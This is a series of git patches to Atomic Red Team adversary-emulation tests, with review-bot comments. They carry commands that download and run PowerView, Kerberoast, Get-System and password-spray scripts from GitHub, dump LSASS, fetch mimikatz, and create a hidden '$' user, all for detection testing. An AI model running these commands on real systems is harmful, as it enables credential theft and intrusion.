\"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell 
@@ -50047,10 +50067,9 @@ discovery: supported_platforms: - windows executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Find-LocalAdminAccess -Verbose - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose name: powershell - name: Find local admins on all machines in domain (PowerView) auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd @@ -50062,10 +50081,9 @@ discovery: supported_platforms: - windows executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose name: powershell - name: Find Local Admins via Group Policy (PowerView) auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a 
@@ -50081,9 +50099,9 @@ discovery: type: Path default: "$env:COMPUTERNAME" executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} - -Verbose' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" name: powershell - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b @@ -50143,10 +50161,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - -' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=group)\n" name: command_prompt 
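Review bot: The rewritten Find-GPOComputerAdmin command in the first hunk on this line ends with a stray double quote — `... -ComputerName #{computer_name} -Verbose"` — which the old single-quoted scalar did not contain, so PowerShell will see an unterminated string and the test fails to parse before PowerView is even fetched. Drop the trailing character so the line ends with `-Verbose`. The same text appears on the new side of the T1069.002.md hunk further down, and since both index.yaml and the markdown are regenerated from the technique yaml, T1069.002.yaml (not in this view) is presumably where the typo lives.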
@@ -51226,10 +51243,9 @@ discovery: supported_platforms: - windows executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose name: powershell T1040: technique: @@ -53292,10 +53308,9 @@ discovery: supported_platforms: - windows executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose name: powershell T1007: technique: @@ -60056,7 +60071,8 @@ execution: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell 
@@ -68135,6 +68151,7 @@ initial-access: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 26822e04..94a97982 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -99,6 +99,7 @@ if (Test-Path #{wce_exe}) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ Expand-Archive $zippath $parentpath\wce -Force @@ -155,6 +156,7 @@ if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null 
@@ -238,6 +240,7 @@ if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} ``` @@ -312,6 +315,7 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) $response = $request.GetResponse() @@ -417,6 +421,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump ``` @@ -610,6 +615,7 @@ if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} ``` diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index f716aaf5..45930a48 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md 
@@ -118,6 +118,7 @@ if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll" ``` diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 9c9b5bfe..60000e3a 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -95,6 +95,7 @@ Find existing user session on other computers. Upon execution, information about ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose ``` diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index 82634bed..a290333a 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -181,6 +181,7 @@ This module utilizes the Windows API to schedule a task for code execution (note ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" ``` diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index b8770a1b..f3965a9e 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md 
@@ -72,6 +72,7 @@ This module executes notepad.exe from within the WINWORD.EXE process ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" ``` diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index c1a2510e..9a4adae9 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -32,6 +32,7 @@ is required. ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" ``` @@ -100,6 +101,7 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null @@ -112,6 +114,7 @@ if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null 
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 2eeb4a9f..47d17a9b 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -124,6 +124,7 @@ Find machines where user has local admin access (PowerView). Upon execution, pro ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose ``` @@ -148,6 +149,7 @@ Enumerates members of the local Administrators groups across all machines in the ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose ``` @@ -177,7 +179,8 @@ takes a computer and determines who has admin rights over it through GPO enumera ```powershell -IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" ``` @@ -266,6 +269,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` 
diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index 3f420431..b1f7c663 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -93,6 +93,7 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" ``` diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index 7c23832c..5b71930e 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -96,6 +96,7 @@ https://github.com/dafthack/DomainPasswordSpray ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force ``` diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index c85e124d..cc5c2a7a 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -115,6 +115,7 @@ This module copies the data stored in the user's clipboard and writes it to a fi ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md index 05f6a2a7..031d8e3a 100644 
--- a/atomics/T1134.001/T1134.001.md +++ b/atomics/T1134.001/T1134.001.md @@ -29,6 +29,7 @@ Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-get ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose ``` @@ -54,6 +55,7 @@ When executed successfully, the test displays the domain and name of the account ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose ``` diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 4cbe849e..102c0d90 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -186,6 +186,7 @@ Enumerate Domain Shares the current user has access. Upon execution, progress in ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose ``` diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index 76606bc1..a1251039 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -27,6 +27,7 @@ them to $env:TEMP\windows-credentials.txt ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` 
diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index f2312394..3dee6b3b 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -35,6 +35,7 @@ If the testing domain doesn't have any service principal name configured, there ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl ``` diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 26ccd064..c2d9c76d 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -40,6 +40,7 @@ oleObject.bin file is a payload that is parsed out and executed on the file syst ```powershell $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap ``` diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index 349306a5..a29d97dd 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -69,6 +69,7 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8 ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" 
From 2710d10531ef1816d245770984c31df423a3bdeb Mon Sep 17 00:00:00 2001 From: adeliktas <64136642+adeliktas@users.noreply.github.com> Date: Wed, 16 Jun 2021 22:28:41 +0200 Subject: [PATCH 50/84] T1566.001-1 download bugfixes (#1522) * T1566.001-1 download bugfixes * comment update Co-authored-by: Carrie Roberts --- atomics/T1566.001/T1566.001.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml index 1936e8b1..de1a135a 100644 --- a/atomics/T1566.001/T1566.001.yaml +++ b/atomics/T1566.001/T1566.001.yaml @@ -6,6 +6,7 @@ atomic_tests: description: | The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. + File is downloaded to the %temp% folder. supported_platforms: - windows executor: @@ -14,13 +15,13 @@ atomic_tests: return 'Please install Microsoft Excel before running this test.' } else{ - $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' + $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' $fileName = 'PhishingAttachment.xlsm' New-Item -Type File -Force -Path $fileName | out-null $wc = New-Object System.Net.WebClient $wc.Encoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - ($wc.DownloadString("$url")) | Out-File $fileName + Invoke-WebRequest -Uri $url -OutFile $fileName } name: powershell - name: Word spawned a command shell and used an IP address in the command line From 532f4dc8828eb9c38b54fed10d8a6aab65b3702a Mon Sep 17 00:00:00 2001 
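Review bot: The added description sentence `File is downloaded to the %temp% folder.` sits directly after the existing sentence saying the file is downloaded "to the current location", and the command below writes to the relative path `$fileName = 'PhishingAttachment.xlsm'` with no `$env:TEMP` in it, so the two statements only agree if the runner's working directory happens to be %temp%. Either say which applies, e.g. `File is downloaded to the current working directory.`, or make the path explicit with `$fileName = "$env:TEMP\PhishingAttachment.xlsm"` in the command hunk, which is separate from this one.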
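Review bot: After the switch to `Invoke-WebRequest -Uri $url -OutFile $fileName`, the three lines above it that prepare the WebClient — `$wc = New-Object System.Net.WebClient`, `$wc.Encoding = [System.Text.Encoding]::UTF8` and the `New-Item -Type File -Force -Path $fileName | out-null` pre-creation — no longer do anything, since `$wc` is never used and `-OutFile` creates the file itself; they should go with this change. The URL change from `/blob/` to `/raw/` is the real fix (the blob URL serves GitHub's HTML page rather than the workbook), and a short comment such as `# raw URL: the /blob/ page returns HTML, not the workbook` would keep the next contributor from reverting it. The download still has no integrity check; the repo's Invoke-WebRequestVerifyHash helper, used in the T1003.001 prereq commands earlier in this series, would fit here. The enclosing `else{` block opens and closes within this hunk.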
From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 20:28:57 +0000 Subject: [PATCH 51/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 5 +++-- atomics/T1566.001/T1566.001.md | 5 +++-- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 55705447..d83f2365 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -68098,6 +68098,7 @@ initial-access: description: | The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. + File is downloaded to the %temp% folder. supported_platforms: - windows executor: @@ -68106,13 +68107,13 @@ initial-access: return 'Please install Microsoft Excel before running this test.' } else{ - $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' + $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' $fileName = 'PhishingAttachment.xlsm' New-Item -Type File -Force -Path $fileName | out-null $wc = New-Object System.Net.WebClient $wc.Encoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - ($wc.DownloadString("$url")) | Out-File $fileName + Invoke-WebRequest -Uri $url -OutFile $fileName } name: powershell - name: Word spawned a command shell and used an IP address in the command line diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index a29d97dd..08745edd 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md 
@@ -16,6 +16,7 @@ There are many options for the attachment such as Microsoft Office documents, ex ## Atomic Test #1 - Download Phishing Attachment - VBScript The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. +File is downloaded to the %temp% folder. **Supported Platforms:** Windows @@ -31,13 +32,13 @@ if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){ return 'Please install Microsoft Excel before running this test.' } else{ - $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' + $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' $fileName = 'PhishingAttachment.xlsm' New-Item -Type File -Force -Path $fileName | out-null $wc = New-Object System.Net.WebClient $wc.Encoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - ($wc.DownloadString("$url")) | Out-File $fileName + Invoke-WebRequest -Uri $url -OutFile $fileName } ``` From 388f671d9301961ed795d1e9995eb02a126999dc Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 16 Jun 2021 15:38:19 -0600 Subject: [PATCH 52/84] name update (#1521) Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- atomics/T1564/T1564.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 135e5897..2a20881f 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml 
@@ -39,7 +39,7 @@ atomic_tests: cleanup_command: | Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore name: powershell -- name: Create a user called "$" as noted here +- name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 description: Creating a user with a username containing "$" supported_platforms: From 7e428d79d08b0410d38626e4160770cdbc5031e6 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 21:38:51 +0000 Subject: [PATCH 53/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/Indexes-Markdown/index.md | 2 +- atomics/Indexes/Indexes-Markdown/windows-index.md | 2 +- atomics/Indexes/index.yaml | 2 +- atomics/T1564/T1564.md | 4 ++-- 6 files changed, 7 insertions(+), 7 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index b3f87204..b071737c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -326,7 +326,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell -defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt +defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual 